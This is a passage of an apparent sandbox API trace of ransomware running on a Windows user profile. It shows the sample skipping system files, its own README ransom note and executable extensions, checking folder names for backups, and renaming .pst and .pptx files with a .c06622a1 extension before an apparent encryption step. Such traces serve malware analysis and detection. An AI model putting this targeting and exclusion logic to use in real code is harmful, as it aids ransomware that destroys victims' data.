4 [0157.918] wcsstr (_Str="voeimd@djhreuu.uhd.pst", _SubStr="README") returned 0x0 [0157.918] _wcsicmp (_Str1="autorun.inf", _Str2="voeimd@djhreuu.uhd.pst") returned -21 [0157.918] wcslen (_String="autorun.inf") returned 0xb [0157.918] _wcsicmp (_Str1="boot.ini", _Str2="voeimd@djhreuu.uhd.pst") returned -20 [0157.918] wcslen (_String="boot.ini") returned 0x8 [0157.918] _wcsicmp (_Str1="bootfont.bin", _Str2="voeimd@djhreuu.uhd.pst") returned -20 [0157.918] wcslen (_String="bootfont.bin") returned 0xc [0157.918] _wcsicmp (_Str1="bootsect.bak", _Str2="voeimd@djhreuu.uhd.pst") returned -20 [0157.918] wcslen (_String="bootsect.bak") returned 0xc [0157.918] _wcsicmp (_Str1="desktop.ini", _Str2="voeimd@djhreuu.uhd.pst") returned -18 [0157.918] wcslen (_String="desktop.ini") returned 0xb [0157.918] _wcsicmp (_Str1="iconcache.db", _Str2="voeimd@djhreuu.uhd.pst") returned -13 [0157.918] wcslen (_String="iconcache.db") returned 0xc [0157.918] _wcsicmp (_Str1="ntldr", _Str2="voeimd@djhreuu.uhd.pst") returned -8 [0157.918] wcslen (_String="ntldr") returned 0x5 [0157.918] _wcsicmp (_Str1="ntuser.dat", _Str2="voeimd@djhreuu.uhd.pst") returned -8 [0157.918] wcslen (_String="ntuser.dat") returned 0xa [0157.918] _wcsicmp (_Str1="ntuser.dat.log", _Str2="voeimd@djhreuu.uhd.pst") returned -8 [0157.918] wcslen (_String="ntuser.dat.log") returned 0xe [0157.918] _wcsicmp (_Str1="ntuser.ini", _Str2="voeimd@djhreuu.uhd.pst") returned -8 [0157.918] wcslen (_String="ntuser.ini") returned 0xa [0157.918] _wcsicmp (_Str1="thumbs.db", _Str2="voeimd@djhreuu.uhd.pst") returned -2 [0157.918] wcslen (_String="thumbs.db") returned 0x9 [0157.918] _wcsicmp (_Str1="386", _Str2="pst") returned -61 [0157.918] wcslen (_String="386") returned 0x3 [0157.918] _wcsicmp (_Str1="adv", _Str2="pst") returned -15 [0157.918] wcslen (_String="adv") returned 0x3 [0157.918] _wcsicmp (_Str1="ani", _Str2="pst") returned -15 [0157.918] wcslen (_String="ani") returned 0x3 [0157.918] _wcsicmp (_Str1="bat", _Str2="pst") returned -14 [0157.918] wcslen (_String="bat") returned 0x3 [0157.918] _wcsicmp (_Str1="bin", _Str2="pst") returned -14 [0157.918] wcslen (_String="bin") returned 0x3 [0157.919] _wcsicmp (_Str1="cab", _Str2="pst") returned -13 [0157.919] wcslen (_String="cab") returned 0x3 [0157.919] _wcsicmp (_Str1="cmd", _Str2="pst") returned -13 [0157.919] wcslen (_String="cmd") returned 0x3 [0157.919] _wcsicmp (_Str1="com", _Str2="pst") returned -13 [0157.919] wcslen (_String="com") returned 0x3 [0157.919] _wcsicmp (_Str1="cpl", _Str2="pst") returned -13 [0157.919] wcslen (_String="cpl") returned 0x3 [0157.919] _wcsicmp (_Str1="cur", _Str2="pst") returned -13 [0157.919] wcslen (_String="cur") returned 0x3 [0157.919] _wcsicmp (_Str1="deskthemepack", _Str2="pst") returned -12 [0157.919] wcslen (_String="deskthemepack") returned 0xd [0157.919] _wcsicmp (_Str1="diagcab", _Str2="pst") returned -12 [0157.919] wcslen (_String="diagcab") returned 0x7 [0157.919] _wcsicmp (_Str1="diagcfg", _Str2="pst") returned -12 [0157.919] wcslen (_String="diagcfg") returned 0x7 [0157.919] _wcsicmp (_Str1="diagpkg", _Str2="pst") returned -12 [0157.919] wcslen (_String="diagpkg") returned 0x7 [0157.919] _wcsicmp (_Str1="dll", _Str2="pst") returned -12 [0157.919] wcslen (_String="dll") returned 0x3 [0157.919] _wcsicmp (_Str1="drv", _Str2="pst") returned -12 [0157.919] wcslen (_String="drv") returned 0x3 [0157.919] _wcsicmp (_Str1="exe", _Str2="pst") returned -11 [0157.919] wcslen (_String="exe") returned 0x3 [0157.919] _wcsicmp (_Str1="hlp", _Str2="pst") returned -8 [0157.919] wcslen (_String="hlp") returned 0x3 [0157.919] _wcsicmp (_Str1="icl", _Str2="pst") returned -7 [0157.919] wcslen (_String="icl") returned 0x3 [0157.919] _wcsicmp (_Str1="icns", _Str2="pst") returned -7 [0157.919] wcslen (_String="icns") returned 0x4 [0157.919] _wcsicmp (_Str1="ico", _Str2="pst") returned -7 [0157.919] wcslen (_String="ico") returned 0x3 [0157.919] _wcsicmp (_Str1="ics", _Str2="pst") returned -7 [0157.919] wcslen (_String="ics") returned 0x3 [0157.919] _wcsicmp (_Str1="idx", _Str2="pst") returned -7 [0157.919] wcslen (_String="idx") returned 0x3 [0157.919] _wcsicmp (_Str1="ldf", _Str2="pst") returned -4 [0157.919] wcslen (_String="ldf") returned 0x3 [0157.920] _wcsicmp (_Str1="lnk", _Str2="pst") returned -4 [0157.920] wcslen (_String="lnk") returned 0x3 [0157.920] _wcsicmp (_Str1="mod", _Str2="pst") returned -3 [0157.920] wcslen (_String="mod") returned 0x3 [0157.920] _wcsicmp (_Str1="mpa", _Str2="pst") returned -3 [0157.920] wcslen (_String="mpa") returned 0x3 [0157.920] _wcsicmp (_Str1="msc", _Str2="pst") returned -3 [0157.920] wcslen (_String="msc") returned 0x3 [0157.920] _wcsicmp (_Str1="msp", _Str2="pst") returned -3 [0157.920] wcslen (_String="msp") returned 0x3 [0157.920] _wcsicmp (_Str1="msstyles", _Str2="pst") returned -3 [0157.920] wcslen (_String="msstyles") returned 0x8 [0157.920] _wcsicmp (_Str1="msu", _Str2="pst") returned -3 [0157.920] wcslen (_String="msu") returned 0x3 [0157.920] _wcsicmp (_Str1="nls", _Str2="pst") returned -2 [0157.920] wcslen (_String="nls") returned 0x3 [0157.920] _wcsicmp (_Str1="nomedia", _Str2="pst") returned -2 [0157.920] wcslen (_String="nomedia") returned 0x7 [0157.920] _wcsicmp (_Str1="ocx", _Str2="pst") returned -1 [0157.920] wcslen (_String="ocx") returned 0x3 [0157.920] _wcsicmp (_Str1="prf", _Str2="pst") returned -1 [0157.920] wcslen (_String="prf") returned 0x3 [0157.920] _wcsicmp (_Str1="ps1", _Str2="pst") returned -67 [0157.920] wcslen (_String="ps1") returned 0x3 [0157.920] _wcsicmp (_Str1="rom", _Str2="pst") returned 2 [0157.920] wcslen (_String="rom") returned 0x3 [0157.920] _wcsicmp (_Str1="rtp", _Str2="pst") returned 2 [0157.920] wcslen (_String="rtp") returned 0x3 [0157.920] _wcsicmp (_Str1="scr", _Str2="pst") returned 3 [0157.920] wcslen (_String="scr") returned 0x3 [0157.920] _wcsicmp (_Str1="shs", _Str2="pst") returned 3 [0157.920] wcslen (_String="shs") returned 0x3 [0157.920] _wcsicmp (_Str1="spl", _Str2="pst") returned 3 [0157.920] wcslen (_String="spl") returned 0x3 [0157.920] _wcsicmp (_Str1="sys", _Str2="pst") returned 3 [0157.920] wcslen (_String="sys") returned 0x3 [0157.920] _wcsicmp (_Str1="theme", _Str2="pst") returned 4 [0157.921] wcslen (_String="theme") returned 0x5 [0157.921] _wcsicmp (_Str1="themepack", _Str2="pst") returned 4 [0157.921] wcslen (_String="themepack") returned 0x9 [0157.921] _wcsicmp (_Str1="wpx", _Str2="pst") returned 7 [0157.921] wcslen (_String="wpx") returned 0x3 [0157.921] _wcsicmp (_Str1="lock", _Str2="pst") returned -4 [0157.921] wcslen (_String="lock") returned 0x4 [0157.921] _wcsicmp (_Str1="key", _Str2="pst") returned -5 [0157.921] wcslen (_String="key") returned 0x3 [0157.921] _wcsicmp (_Str1="hta", _Str2="pst") returned -8 [0157.921] wcslen (_String="hta") returned 0x3 [0157.921] _wcsicmp (_Str1="msi", _Str2="pst") returned -3 [0157.921] wcslen (_String="msi") returned 0x3 [0157.921] _wcsicmp (_Str1="pdb", _Str2="pst") returned -15 [0157.921] wcslen (_String="pdb") returned 0x3 [0157.921] _wcsicmp (_Str1="sqlite", _Str2="pst") returned 3 [0157.921] wcslen (_String="sqlite") returned 0x6 [0157.921] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files")) returned 0x10 [0157.921] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0157.921] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0157.921] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned 0x39 [0157.921] wcscpy (in: _Dest=0x32400d4, _Source="voeimd@djhreuu.uhd.pst" | out: _Dest="voeimd@djhreuu.uhd.pst") returned="voeimd@djhreuu.uhd.pst" [0157.921] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", dwFileAttributes=0x80) returned 1 [0157.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0157.922] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.922] ReadFile (in: hFile=0x1ac, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0157.922] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xbcac1050 [0157.922] RtlComputeCrc32 (PartialCrc=0x1050, Buffer=0x32e9a4, Length=0x80) returned 0xe62c5159 [0157.922] RtlComputeCrc32 (PartialCrc=0x5159, Buffer=0x32e9a4, Length=0x80) returned 0x483eb1c5 [0157.923] RtlComputeCrc32 (PartialCrc=0xb1c5, Buffer=0x32e9a4, Length=0x80) returned 0x1ece357 [0157.923] RtlComputeCrc32 (PartialCrc=0xe357, Buffer=0x32e9a4, Length=0x80) returned 0x63268cde [0157.923] CloseHandle (hObject=0x1ac) returned 1 [0157.923] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0157.923] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" [0157.923] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 0x50 [0157.923] wcscpy (in: _Dest=0x3250108, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.923] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.c06622a1"), dwFlags=0x8) returned 1 [0157.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1ac [0157.925] CreateIoCompletionPort (FileHandle=0x1ac, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0157.925] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0157.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x18933ce2 [0157.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3fb04f72 [0157.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x98ea7cf [0157.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4cd43b74 [0157.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xae92ef7 [0157.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7847a4ae [0157.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x48f4755a [0157.932] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5404a470 [0157.935] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x521dfe59 [0157.935] RtlComputeCrc32 (PartialCrc=0xfe59, Buffer=0x2b70094, Length=0x80) returned 0x541eddd6 [0157.935] RtlComputeCrc32 (PartialCrc=0xddd6, Buffer=0x2b70094, Length=0x80) returned 0xc415f7cc [0157.935] RtlComputeCrc32 (PartialCrc=0xf7cc, Buffer=0x2b70094, Length=0x80) returned 0x2ed33d84 [0157.935] RtlComputeCrc32 (PartialCrc=0x3d84, Buffer=0x2b70094, Length=0x80) returned 0x62aec5fd [0157.935] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0157.936] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0157.936] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0157.936] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.936] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0157.936] _wcsicmp (_Str1="backup", _Str2="Outlook Files") returned -13 [0157.936] wcslen (_String="backup") returned 0x6 [0157.936] _wcsicmp (_Str1="bak", _Str2="Outlook Files") returned -13 [0157.936] wcslen (_String="bak") returned 0x3 [0157.936] _wcsicmp (_Str1="back", _Str2="Outlook Files") returned -13 [0157.936] wcslen (_String="back") returned 0x4 [0157.936] _wcsicmp (_Str1="archive", _Str2="Outlook Files") returned -14 [0157.936] wcslen (_String="archive") returned 0x7 [0157.936] _wcsicmp (_Str1="bckp", _Str2="Outlook Files") returned -13 [0157.936] wcslen (_String="bckp") returned 0x4 [0157.936] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.938] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.939] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b4e5500, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8b4e5500, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8b4e5500, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0157.939] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0157.939] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf46194e0, ftCreationTime.dwHighDateTime=0x1d5e55e, ftLastAccessTime.dwLowDateTime=0x8da1fb80, ftLastAccessTime.dwHighDateTime=0x1d5a45b, ftLastWriteTime.dwLowDateTime=0x8da1fb80, ftLastWriteTime.dwHighDateTime=0x1d5a45b, nFileSizeHigh=0x0, nFileSizeLow=0xc49, dwReserved0=0x0, dwReserved1=0x0, cFileName="rg_etqM_g.pptx", cAlternateFileName="RG_ETQ~1.PPT")) returned 1 [0157.939] _wcsicmp (_Str1="rg_etqM_g.pptx", _Str2="README.c06622a1.TXT") returned 2 [0157.939] wcsstr (_Str="rg_etqM_g.pptx", _SubStr="README") returned 0x0 [0157.939] _wcsicmp (_Str1="autorun.inf", _Str2="rg_etqM_g.pptx") returned -17 [0157.939] wcslen (_String="autorun.inf") returned 0xb [0157.939] _wcsicmp (_Str1="boot.ini", _Str2="rg_etqM_g.pptx") returned -16 [0157.939] wcslen (_String="boot.ini") returned 0x8 [0157.939] _wcsicmp (_Str1="bootfont.bin", _Str2="rg_etqM_g.pptx") returned -16 [0157.939] wcslen (_String="bootfont.bin") returned 0xc [0157.939] _wcsicmp (_Str1="bootsect.bak", _Str2="rg_etqM_g.pptx") returned -16 [0157.939] wcslen (_String="bootsect.bak") returned 0xc [0157.939] _wcsicmp (_Str1="desktop.ini", _Str2="rg_etqM_g.pptx") returned -14 [0157.939] wcslen (_String="desktop.ini") returned 0xb [0157.939] _wcsicmp (_Str1="iconcache.db", _Str2="rg_etqM_g.pptx") returned -9 [0157.940] wcslen (_String="iconcache.db") returned 0xc [0157.940] _wcsicmp (_Str1="ntldr", _Str2="rg_etqM_g.pptx") returned -4 [0157.940] wcslen (_String="ntldr") returned 0x5 [0157.940] _wcsicmp (_Str1="ntuser.dat", _Str2="rg_etqM_g.pptx") returned -4 [0157.940] wcslen (_String="ntuser.dat") returned 0xa [0157.940] _wcsicmp (_Str1="ntuser.dat.log", _Str2="rg_etqM_g.pptx") returned -4 [0157.940] wcslen (_String="ntuser.dat.log") returned 0xe [0157.940] _wcsicmp (_Str1="ntuser.ini", _Str2="rg_etqM_g.pptx") returned -4 [0157.940] wcslen (_String="ntuser.ini") returned 0xa [0157.940] _wcsicmp (_Str1="thumbs.db", _Str2="rg_etqM_g.pptx") returned 2 [0157.940] wcslen (_String="thumbs.db") returned 0x9 [0157.940] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0157.940] wcslen (_String="386") returned 0x3 [0157.940] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0157.940] wcslen (_String="adv") returned 0x3 [0157.940] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0157.940] wcslen (_String="ani") returned 0x3 [0157.940] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0157.940] wcslen (_String="bat") returned 0x3 [0157.940] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0157.940] wcslen (_String="bin") returned 0x3 [0157.940] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0157.940] wcslen (_String="cab") returned 0x3 [0157.940] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0157.940] wcslen (_String="cmd") returned 0x3 [0157.940] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0157.940] wcslen (_String="com") returned 0x3 [0157.940] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0157.940] wcslen (_String="cpl") returned 0x3 [0157.940] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0157.940] wcslen (_String="cur") returned 0x3 [0157.940] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0157.940] wcslen (_String="deskthemepack") returned 0xd [0157.941] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0157.941] wcslen (_String="diagcab") returned 0x7 [0157.941] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0157.941] wcslen (_String="diagcfg") returned 0x7 [0157.941] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0157.941] wcslen (_String="diagpkg") returned 0x7 [0157.941] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0157.941] wcslen (_String="dll") returned 0x3 [0157.941] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0157.941] wcslen (_String="drv") returned 0x3 [0157.941] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0157.941] wcslen (_String="exe") returned 0x3 [0157.941] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0157.941] wcslen (_String="hlp") returned 0x3 [0157.941] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0157.941] wcslen (_String="icl") returned 0x3 [0157.941] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0157.941] wcslen (_String="icns") returned 0x4 [0157.941] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0157.941] wcslen (_String="ico") returned 0x3 [0157.941] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0157.941] wcslen (_String="ics") returned 0x3 [0157.941] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0157.941] wcslen (_String="idx") returned 0x3 [0157.941] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0157.941] wcslen (_String="ldf") returned 0x3 [0157.941] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0157.941] wcslen (_String="lnk") returned 0x3 [0157.941] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0157.941] wcslen (_String="mod") returned 0x3 [0157.941] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0157.941] wcslen (_String="mpa") returned 0x3 [0157.941] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0157.941] wcslen (_String="msc") returned 0x3 [0157.941] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0157.942] wcslen (_String="msp") returned 0x3 [0157.942] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0157.942] wcslen (_String="msstyles") returned 0x8 [0157.942] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0157.942] wcslen (_String="msu") returned 0x3 [0157.942] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0157.942] wcslen (_String="nls") returned 0x3 [0157.942] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0157.942] wcslen (_String="nomedia") returned 0x7 [0157.942] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0157.942] wcslen (_String="ocx") returned 0x3 [0157.942] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0157.942] wcslen (_String="prf") returned 0x3 [0157.942] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0157.942] wcslen (_String="ps1") returned 0x3 [0157.942] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0157.942] wcslen (_String="rom") returned 0x3 [0157.942] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0157.942] wcslen (_String="rtp") returned 0x3 [0157.942] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0157.942] wcslen (_String="scr") returned 0x3 [0157.942] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0157.942] wcslen (_String="shs") returned 0x3 [0157.942] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0157.942] wcslen (_String="spl") returned 0x3 [0157.942] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0157.942] wcslen (_String="sys") returned 0x3 [0157.942] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0157.942] wcslen (_String="theme") returned 0x5 [0157.942] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0157.942] wcslen (_String="themepack") returned 0x9 [0157.942] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0157.943] wcslen (_String="wpx") returned 0x3 [0157.943] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0157.943] wcslen (_String="lock") returned 0x4 [0157.943] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0157.943] wcslen (_String="key") returned 0x3 [0157.943] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0157.943] wcslen (_String="hta") returned 0x3 [0157.943] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0157.943] wcslen (_String="msi") returned 0x3 [0157.943] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0157.943] wcslen (_String="pdb") returned 0x3 [0157.943] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0157.943] wcslen (_String="sqlite") returned 0x6 [0157.943] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.943] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.943] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.943] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.943] wcscpy (in: _Dest=0x32100a0, _Source="rg_etqM_g.pptx" | out: _Dest="rg_etqM_g.pptx") returned="rg_etqM_g.pptx" [0157.943] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rg_etqM_g.pptx", dwFileAttributes=0x80) returned 1 [0157.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rg_etqM_g.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rg_etqm_g.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0157.944] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.944] ReadFile (in: hFile=0x1d8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.945] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x3bba7774 [0157.945] RtlComputeCrc32 (PartialCrc=0x7774, Buffer=0x32ec24, Length=0x80) returned 0xfc012552 [0157.945] RtlComputeCrc32 (PartialCrc=0x2552, Buffer=0x32ec24, Length=0x80) returned 0xf3b4bca4 [0157.945] RtlComputeCrc32 (PartialCrc=0xbca4, Buffer=0x32ec24, Length=0x80) returned 0xdc501dd [0157.945] RtlComputeCrc32 (PartialCrc=0x1dd, Buffer=0x32ec24, Length=0x80) returned 0x50ba8d77 [0157.945] CloseHandle (hObject=0x1d8) returned 1 [0157.945] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.945] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rg_etqM_g.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rg_etqM_g.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rg_etqM_g.pptx" [0157.945] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rg_etqM_g.pptx") returned 0x3a [0157.945] wcscpy (in: _Dest=0x32200c4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.945] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rg_etqM_g.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rg_etqm_g.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rg_etqM_g.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js 